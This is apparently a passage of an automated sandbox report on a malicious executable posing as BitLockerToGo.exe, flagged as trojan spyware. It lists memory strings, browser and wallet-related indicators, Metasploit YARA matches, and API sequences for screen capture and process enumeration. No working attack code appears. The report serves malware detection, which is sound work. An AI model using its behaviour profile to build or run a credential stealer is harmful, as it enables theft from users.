                      Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0N
                      Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0X
                      Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: BitLockerToGo.exe, BitLockerToGo.exe, 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                      Source: BitLockerToGo.exe, 00000001.00000002.2077374540.000000001CBDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2084293154.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecop
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecopnacl
                      Source: JEBFIIIE.1.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2081688991.0000000028BF1000.00000004.00000020.00020000.00000000.sdmp, GHDHJEBFBFHJECAKFCAA.1.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2081688991.0000000028BF1000.00000004.00000020.00020000.00000000.sdmp, GHDHJEBFBFHJECAKFCAA.1.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                      Source: JEBFIIIE.1.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, JEBFIIIE.1.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, JEBFIIIE.1.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2081688991.0000000028BF1000.00000004.00000020.00020000.00000000.sdmp, GHDHJEBFBFHJECAKFCAA.1.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2081688991.0000000028BF1000.00000004.00000020.00020000.00000000.sdmp, GHDHJEBFBFHJECAKFCAA.1.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: https://doi.org/GTB
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, JEBFIIIE.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: JEBFIIIE.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, JEBFIIIE.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: GHDHJEBFBFHJECAKFCAA.1.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                      Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: https://mozilla.org0/
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: https://ramensoftware.com/0
                      Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.1.drString found in binary or memory: https://support.mozilla.org
                      Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.1.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                      Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.1.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1913485231.0000000022B61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1913485231.0000000022B61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17ate
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2081688991.0000000028BF1000.00000004.00000020.00020000.00000000.sdmp, GHDHJEBFBFHJECAKFCAA.1.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                      Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: JEBFIIIE.1.drString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: BitLockerToGo.exe, 00000001.00000002.2061952905.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000002.2081688991.0000000028BF1000.00000004.00000020.00020000.00000000.sdmp, GHDHJEBFBFHJECAKFCAA.1.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                      Source: JEBFIIIE.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.1.drString found in binary or memory: https://www.mozilla.org
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                      Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.1.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                      Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.1.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                      Source: BitLockerToGo.exe, 00000001.00000003.2001248684.0000000028EB3000.00000004.00000020.00020000.00000000.sdmp, KEHDBAEGIIIEBGCAAFHIDHDBFB.1.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
                      Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.1.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                      Source: BitLockerToGo.exe, 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                      Source: BitLockerToGo.exe, 00000001.00000003.2001248684.0000000028EB3000.00000004.00000020.00020000.00000000.sdmp, KEHDBAEGIIIEBGCAAFHIDHDBFB.1.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02769010 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,1_2_02769010

                      System Summary

                      barindex
                      Source: 00000000.00000002.1843071659.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
                      Source: 00000000.00000002.1843071659.0000000002466000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
                      Source: 00000000.00000002.1843071659.000000000232E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C81ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,1_2_6C81ED10
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C85B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,1_2_6C85B700
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C85B8C0 rand_s,NtQueryVirtualMemory,1_2_6C85B8C0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C85B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,1_2_6C85B910
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C7FF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,1_2_6C7FF280
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C7F35A01_2_6C7F35A0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C806C801_2_6C806C80
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C8534A01_2_6C8534A0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C85C4A01_2_6C85C4A0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C8064C01_2_6C8064C0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C81D4D01_2_6C81D4D0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C836CF01_2_6C836CF0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C86AC001_2_6C86AC00
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C835C101_2_6C835C10
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C842C101_2_6C842C10
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C7FD4E01_2_6C7FD4E0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C86542B1_2_6C86542B
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C8054401_2_6C805440
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C86545C1_2_6C86545C
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C830DD01_2_6C830DD0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C8585F01_2_6C8585F0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C80FD001_2_6C80FD00
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C8205121_2_6C820512
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C81ED101_2_6C81ED10
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C85E6801_2_6C85E680
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C7FC6701_2_6C7FC670
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C815E901_2_6C815E90
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C854EA01_2_6C854EA0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C8676E31_2_6C8676E3
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C80FEF01_2_6C80FEF0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C8456001_2_6C845600
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C7FBEF01_2_6C7FBEF0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C837E101_2_6C837E10
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C859E301_2_6C859E30
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C8146401_2_6C814640
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C842E4E1_2_6C842E4E
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C819E501_2_6C819E50
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C833E501_2_6C833E50
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C866E631_2_6C866E63
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C8477A01_2_6C8477A0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C826FF01_2_6C826FF0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C809F001_2_6C809F00
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C8377101_2_6C837710
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C7FDFE01_2_6C7FDFE0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C8260A01_2_6C8260A0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C8650C71_2_6C8650C7
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C81C0E01_2_6C81C0E0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C8358E01_2_6C8358E0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C8078101_2_6C807810
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C83B8201_2_6C83B820
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C8448201_2_6C844820
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C8188501_2_6C818850
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C81D8501_2_6C81D850
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C83F0701_2_6C83F070
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C8351901_2_6C835190
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C8529901_2_6C852990
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C82D9B01_2_6C82D9B0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C81A9401_2_6C81A940
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C7FC9A01_2_6C7FC9A0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C80D9601_2_6C80D960
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C84B9701_2_6C84B970
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C86B1701_2_6C86B170
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C86BA901_2_6C86BA90
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C824AA01_2_6C824AA0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C80CAB01_2_6C80CAB0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C862AB01_2_6C862AB0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C838AC01_2_6C838AC0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C811AF01_2_6C811AF0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C83E2F01_2_6C83E2F0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C7F22A01_2_6C7F22A0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C839A601_2_6C839A60
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C7F53401_2_6C7F5340
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C8653C81_2_6C8653C8
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C83D3201_2_6C83D320
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C80C3701_2_6C80C370
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C7FF3801_2_6C7FF380
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C89ECC01_2_6C89ECC0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C8FECD01_2_6C8FECD0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C966C001_2_6C966C00
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C97AC301_2_6C97AC30
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C8AAC601_2_6C8AAC60
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C936D901_2_6C936D90
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C8A4DB01_2_6C8A4DB0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6CA2CDC01_2_6CA2CDC0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6CA28D201_2_6CA28D20
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C9CAD501_2_6C9CAD50
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C96ED701_2_6C96ED70
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C926E901_2_6C926E90
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C8AAEC01_2_6C8AAEC0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C940EC01_2_6C940EC0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C980E201_2_6C980E20
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C93EE701_2_6C93EE70
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 6C82CBE8 appears 134 times
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 6C8394D0 appears 90 times
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 027545C0 appears 317 times
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe, 00000000.00000002.1843071659.000000000223F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 00000000.00000002.1843071659.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                      Source: 00000000.00000002.1843071659.0000000002466000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                      Source: 00000000.00000002.1843071659.000000000232E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeBinary string: [0m[%s]%s %-44s address string too shortresource length too longunpacking Question.Classnon-empty decoder bufferencodeArray: nil elementstreamSafe was not resetmsgpack: unknown code %xflate: maxBits too largeBad 'interval' param: %s\Device\NamedPipe\cygwinrefining %#v to be > %#vrefining %#v to be < %#vNumberLowerBound for %#vNumberUpperBound for %#vLengthLowerBound for %#vLengthUpperBound for %#vchacha20: wrong key sizecould not resolve %q: %vThe string to transform.duplicate column name %qStdlen returned an errorinvalid field number: %dmismatching enum lengthsunknown extension degreeSouth Sudan Standard TimeUS Mountain Standard TimeMiddle East Standard TimeTransbaikal Standard TimeW. Mongolia Standard TimeAfghanistan Standard TimeNorth Korea Standard TimeUlaanbaatar Standard TimeVladivostok Standard TimeAUS Central Standard TimeAUS Eastern Standard TimeKaliningrad Standard TimeNew Zealand Standard Time2006-01-02T15:04:05Z07:00installation_repositoriesbloom bytes too big %d %dresource deadlock avoidedoperation now in progressno buffer space availableno such device or addresssocket type not supportedinvalid cross-device linkGetFinalPathNameByHandleWGetQueuedCompletionStatusUpdateProcThreadAttributenumber of sections is 10+LPSAFEARRAY_UserUnmarshalGetRecordInfoFromTypeInfoarray index out of bounds!#$%&'()-@^_`{}~+,.;=[]\/ARM Thumb-2 little endianMIPS little-endian WCE v2Chinese (Simplified) (zh)Mongolian (Cyrillic) (mn)Bangla Bangladesh (bn-BD)Bosnian (Latin) (bs-Latn)Central Kurdish (ku-Arab)Dari Afghanistan (prs-AF)Dutch Netherlands (nl-NL)English Australia (en-AU)English Hong Kong (en-HK)English Singapore (en-SG)French Caribbean (fr-029)French Congo, Drc (fr-CD)French Luxembourg (fr-LU)German Luxembourg (de-LU)Hungarian Hungary (hu-HU)Icelandic Iceland (is-IS)Kazakh Kazakhstan (kk-KZ)Kyrgyz Kyrgyzstan (ky-KG)Maori New Zealand (mi-NZ)Mapudungun Chile (arn-CL)Portuguese Brazil (pt-BR)Serbian (Latin) (sr-Latn)Setswana Botswana (tn-BW)Sinhala Sri Lanka (si-LK)Spanish Argentina (es-AR)Spanish Guatemala (es-GT)Spanish Nicaragua (es-NI)Tigrinya Ethiopia (ti-ET)Ukrainian Ukraine (uk-UA)Zulu South Africa (zu-ZA)` Contents are null-bytesgoroutine profile cleanupchansend: spurious wakeupruntime
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/22@0/1
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C857030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,1_2_6C857030
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02769600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_02769600
